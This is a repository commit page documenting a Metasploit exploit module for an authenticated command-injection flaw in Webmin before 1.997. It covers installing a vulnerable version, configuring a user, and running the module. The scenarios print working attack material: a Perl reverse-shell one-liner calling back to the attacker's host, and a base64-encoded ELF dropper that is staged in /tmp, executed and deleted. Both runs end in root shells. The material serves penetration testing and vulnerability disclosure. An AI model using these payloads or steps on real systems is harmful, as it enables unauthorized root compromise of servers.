Land #16856, Webmin package updates RCE module
This module exploits an arbitrary command injection in Webmin versions prior to 1.997.
This commit is contained in:
Jack Heysel
@@ -0,0 +1,103 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module exploits an arbitrary command injection in Webmin versions prior to
|
||||
1.997.
|
||||
|
||||
Webmin uses the OS package manager (`apt`, `yum`, etc.) to perform package
|
||||
updates and installation. Due to a lack of input sanitization, it is possible to
|
||||
inject an arbitrary command that will be concatenated to the package manager call.
|
||||
|
||||
This exploit requires authentication and the account must have access to the
|
||||
Software Package Updates module.
|
||||
|
||||
## Installation
|
||||
|
||||
### Ubuntu
|
||||
- Download a vulnerable version: http://prdownloads.sourceforge.net/webadmin/webmin_1.996_all.deb
|
||||
- Install it along with its dependencies (`libio-pty-perl` required when installing on Ubuntu 20.04)
|
||||
```
|
||||
apt-get install libauthen-pam-perl libio-pty-perl
|
||||
dpkg -i ./webmin_1.996_all.deb
|
||||
```
|
||||
|
||||
## Setup
|
||||
- Go to `https://<target IP>:10000/`
|
||||
- Login as `root` with the OS password
|
||||
- Create a new user:
|
||||
`Webmin > Webmin Users > Create a new privileged user > enter the username and password > click Create`
|
||||
- Setup permissions
|
||||
`Click on the username > Available Webmin modules > select "Software Package Updates" in the System module list > Save`
|
||||
|
||||
## Verification Steps
|
||||
1. Install and setup the application
|
||||
1. Start msfconsole
|
||||
1. Do: `use exploit/linux/http/webmin_package_updates_rce`
|
||||
1. Do: `run lhost=<local IP> rhosts=<target IP> username=<username> password=<user password>`
|
||||
1. You should get a shell.
|
||||
|
||||
## Options
|
||||
|
||||
### TARGETURI
|
||||
|
||||
Set this to the Webmin base path. The default is `/`.
|
||||
|
||||
### USERNAME
|
||||
|
||||
The account username to use.
|
||||
|
||||
### PASSWORD
|
||||
|
||||
The account password.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Webmin 1.996 on Ubuntu 18.04
|
||||
- Target 0 (`Unix In-Memory`)
|
||||
```
|
||||
msf6 exploit(linux/http/webmin_package_updates_rce) > run lhost=192.168.0.2 verbose=true rhosts=192.168.0.23 username=msfuser password=123456
|
||||
|
||||
[+] perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.0.2:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
|
||||
[*] Started reverse TCP handler on 192.168.0.2:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Webmin 1.996 detected
|
||||
[+] Webmin 1.996 is a supported target
|
||||
[+] The target appears to be vulnerable.
|
||||
[*] Attempting login
|
||||
[+] Logged in!
|
||||
[*] Sending payload
|
||||
[*] Command shell session 4 opened (192.168.0.2:4444 -> 192.168.0.23:51860) at 2022-08-03 11:26:01 +0200
|
||||
|
||||
id
|
||||
uid=0(root) gid=0(root) groups=0(root)
|
||||
|
||||
cat /etc/issue
|
||||
Ubuntu 18.04.6 LTS \n \l
|
||||
```
|
||||
|
||||
- Target 1 (`Linux Dropper`)
|
||||
```
|
||||
msf6 exploit(linux/http/webmin_package_updates_rce) > run lhost=192.168.0.2 verbose=true rhosts=192.168.0.23 username=msfuser password=123456
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.0.2:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Webmin 1.996 detected
|
||||
[+] Webmin 1.996 is a supported target
|
||||
[+] The target appears to be vulnerable.
|
||||
[*] Attempting login
|
||||
[+] Logged in!
|
||||
[*] Sending payload
|
||||
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCokAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/abOFM.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/IBkCa' < '/tmp/abOFM.b64' ; chmod +x '/tmp/IBkCa' ; '/tmp/IBkCa' ; rm -f '/tmp/IBkCa' ; rm -f '/tmp/abOFM.b64'"]
|
||||
[*] Transmitting intermediate stager...(126 bytes)
|
||||
[*] Sending stage (3020772 bytes) to 192.168.0.23
|
||||
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.23:51870) at 2022-08-03 11:26:51 +0200
|
||||
[*] Command Stager progress - 100.00% done (823/823 bytes)
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: root
|
||||
meterpreter > sysinfo
|
||||
Computer : 192.168.0.23
|
||||
OS : Ubuntu 18.04 (Linux 5.4.0-122-generic)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
```
|
||||
Reference in New Issue
Block a user